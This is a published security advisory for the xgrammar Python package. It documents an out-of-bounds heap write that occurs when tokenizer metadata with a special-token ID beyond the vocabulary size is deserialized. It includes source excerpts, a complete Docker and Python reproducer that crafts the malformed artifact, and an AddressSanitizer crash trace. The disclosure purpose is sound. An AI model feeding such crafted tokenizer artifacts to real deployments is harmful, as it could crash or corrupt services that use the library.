All advisories

Out-of-Bounds Bitmask Write Through Deserialized Tokenizer Metadata

mlc-ai/xgrammar / GHSA-62xg-rx24-qw3m

Affected packages

xgrammar pip
Affected versions>= 0.1.23
Patched versionsNot specified

Description

Out-of-Bounds Bitmask Write Through Deserialized Tokenizer Metadata

Affected repository: mlc-ai/xgrammar
Observed HEAD: f07ca3cb03affaca98809c4e9dad41deed2f7730

Summary

TokenizerInfo::DeserializeJSON accepts a serialized special_token_ids entry that lies outside the artifact's declared vocab_size. Starting with XGrammar v0.1.23, an untrusted tokenizer artifact can therefore violate an invariant that ordinary TokenizerInfo construction is expected to establish. In the assessed main-branch revision f07ca3c, changing only a valid two-token artifact's special-token list to [32] lets the object reach grammar matching; the matcher then accesses data_[1] through a bitset backed by a single 32-bit word. The captured AddressSanitizer run demonstrates a heap-buffer-overflow and process abort. It does not by itself establish controlled code execution.

The deserialization path and unchecked matcher sink are present in every release tag I inspected from v0.1.23 through v0.2.5, as well as v0.2.6rc1 and v0.2.6rc2. v0.1.22 predates TokenizerInfo::DeserializeJSON. I found no upstream fix in the inspected history. I reviewed the exact source and the captured sanitizer trace, compiled the proposed change as part of the core C++ library, and ran a C++ regression using the same two-token artifact and invalid ID; I did not rerun the full Python Docker reproducer while editing this report.

Detail

The root cause is that tokenizer construction and tokenizer deserialization enforce different invariants. The normal TokenizerInfo::Impl constructor derives special_token_ids_ from positions in the supplied vocabulary and from padding positions below vocab_size_. Those construction paths are intended to leave every special-token ID in the half-open interval [0, vocab_size). Matcher code relies on that relationship.

JSON deserialization bypasses the constructor. The reflection member table in cpp/tokenizer_info_impl.h restores vocab_size_ and special_token_ids_ as independent fields. AutoDeserializeJSON checks the JSON version and member types, but it does not know that every special ID must be non-negative and smaller than the restored vocabulary size. TokenizerInfo::DeserializeJSON then rebuilds only token character-count data and returns the object without restoring this cross-field invariant:

if (auto err = AutoDeserializeJSON(&tokenizer_info, json_string, true, "TokenizerInfo")) {
  return err.value();
}
tokenizer_info->BuildTokenCharData();
return tokenizer_info;

The malformed field is not used while compiling the reproducer's string-literal grammar, so the corrupted object survives until GrammarMatcher::Impl::SetTokenBitmask in cpp/grammar_matcher.cc. FillNextTokenBitmask correctly validates and obtains a mask sized for vocab_size == 2; this is one 32-bit word, so the failure is not caused by an undersized caller allocation. When special tokens are disallowed, the matcher trusts every deserialized special ID and clears its corresponding bit:

if (!allow_special_token) {
  for (int id : tokenizer_info_.GetSpecialTokenIds()) {
    next_token_bitset.Set(id, false);
  }
}

DynamicBitset::Set in cpp/support/dynamic_bitset.h has only an XGRAMMAR_DCHECK bounds assertion. Internal checks are disabled in the reproduced build, so an invalid index reaches the bit operation:

if (value) {
  data_[index / 32] |= 1 << (index % 32);
} else {
  data_[index / 32] &= ~(1 << (index % 32));
}

For the supplied ID 32, integer division selects word 32 / 32 == 1. A two-token vocabulary allocates only word 0, making data_[1] exactly four bytes past the allocation. The clear operation is a read-modify-write, which explains why AddressSanitizer reports the first invalid access as a four-byte read even though the operation also attempts to update the out-of-bounds word. There is no intervening normalization, range check, or matcher guard that can make this ID safe.

Reproduce

Fresh validation at current default-branch commit f07ca3cb03affaca98809c4e9dad41deed2f7730 reached the reported sink under AddressSanitizer.

Run the following command against assessed revision f07ca3cb03affaca98809c4e9dad41deed2f7730. It first creates a valid two-token serialization with XGrammar itself and changes only special_token_ids to [32]. AddressSanitizer should terminate the final Python process at DynamicBitset::Set. The container is disposable; the command downloads build dependencies and intentionally crashes only the Python process inside it.

docker run --rm -i python:3.12-slim-bookworm bash <<'DOCKER'
set -eux
export DEBIAN_FRONTEND=noninteractive CMAKE_BUILD_PARALLEL_LEVEL=2
apt-get update -qq
apt-get install -y -qq --no-install-recommends ca-certificates git cmake ninja-build g++
python -m pip install -q --index-url https://download.pytorch.org/whl/cpu torch
python -m pip install -q scikit-build-core apache-tvm-ffi pydantic transformers numpy typing-extensions
mkdir work
cd work
git clone --depth 1 --quiet https://github.com/mlc-ai/xgrammar.git xgrammar
cd xgrammar
git rev-parse HEAD
git submodule update --init --recursive --depth 1 --quiet
ASAN_OPTIONS=verify_asan_link_order=0:detect_leaks=0 \
CXXFLAGS='-D_GLIBCXX_NO_ASSERTIONS -fno-lto -fsanitize=address -fno-omit-frame-pointer -g' \
LDFLAGS='-fno-lto -fsanitize=address' \
  python -m pip install -q --config-settings=cmake.build-type=Debug --no-build-isolation --no-deps .
cat > ../repro.py <<'PY'
import json
import xgrammar as xgr

obj = json.loads(xgr.TokenizerInfo(["a", "b"]).serialize_json())
obj["special_token_ids"] = [32]
tokenizer = xgr.TokenizerInfo.deserialize_json(json.dumps(obj))
compiled = xgr.GrammarCompiler(
    tokenizer, max_threads=1, cache_enabled=False
).compile_grammar('root ::= "a"')
matcher = xgr.GrammarMatcher(compiled)
matcher.fill_next_token_bitmask(xgr.allocate_token_bitmask(1, tokenizer.vocab_size))
PY
cd ..
ASAN_OPTIONS=abort_on_error=1:detect_leaks=0:symbolize=1:handle_segv=2:use_sigaltstack=0:disable_coredump=1 \
LD_PRELOAD="$(g++ -print-file-name=libasan.so)" \
python repro.py
DOCKER
AddressSanitizer report

Container-specific absolute path prefixes and unrelated Python, TVM-FFI, and allocator frames are omitted below; the failing access, allocation boundary, and decisive XGrammar frames are unchanged.

=================================================================
==3255==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x609000000284 at pc 0x7e3fb8f609c0 bp 0x7ffe4be32000 sp 0x7ffe4be31ff8
READ of size 4 at 0x609000000284 thread T0
    #0 0x7e3fb8f609bf in xgrammar::DynamicBitset::Set(int, bool) cpp/support/dynamic_bitset.h:144
    #1 0x7e3fb914de40 in xgrammar::GrammarMatcher::Impl::SetTokenBitmask(int*, xgrammar::DynamicBitset const&, std::vector<int, std::allocator<int> > const&, bool, bool) cpp/grammar_matcher.cc:2462
    #2 0x7e3fb914659d in xgrammar::GrammarMatcher::Impl::FillBitmaskForStates(int*, int, bool, bool) cpp/grammar_matcher.cc:2027
    #3 0x7e3fb9141cf3 in xgrammar::GrammarMatcher::Impl::FillNextTokenBitmask(DLTensor*, int, bool) cpp/grammar_matcher.cc:1700
    #4 0x7e3fb9150407 in xgrammar::GrammarMatcher::FillNextTokenBitmask(DLTensor*, int, bool) cpp/grammar_matcher.cc:2604
    #5 0x7e3fb8d13cdb in operator() build/tvm_ffi.cc:696
    [unrelated runtime frames omitted]

0x609000000284 is located 0 bytes to the right of 4-byte region [0x609000000280,0x609000000284)
allocated by thread T0 here:
    [allocator frames omitted]

SUMMARY: AddressSanitizer: heap-buffer-overflow cpp/support/dynamic_bitset.h:144 in xgrammar::DynamicBitset::Set(int, bool)
==3255==ABORTING

Credit

Zheng Yu @ Depthfirst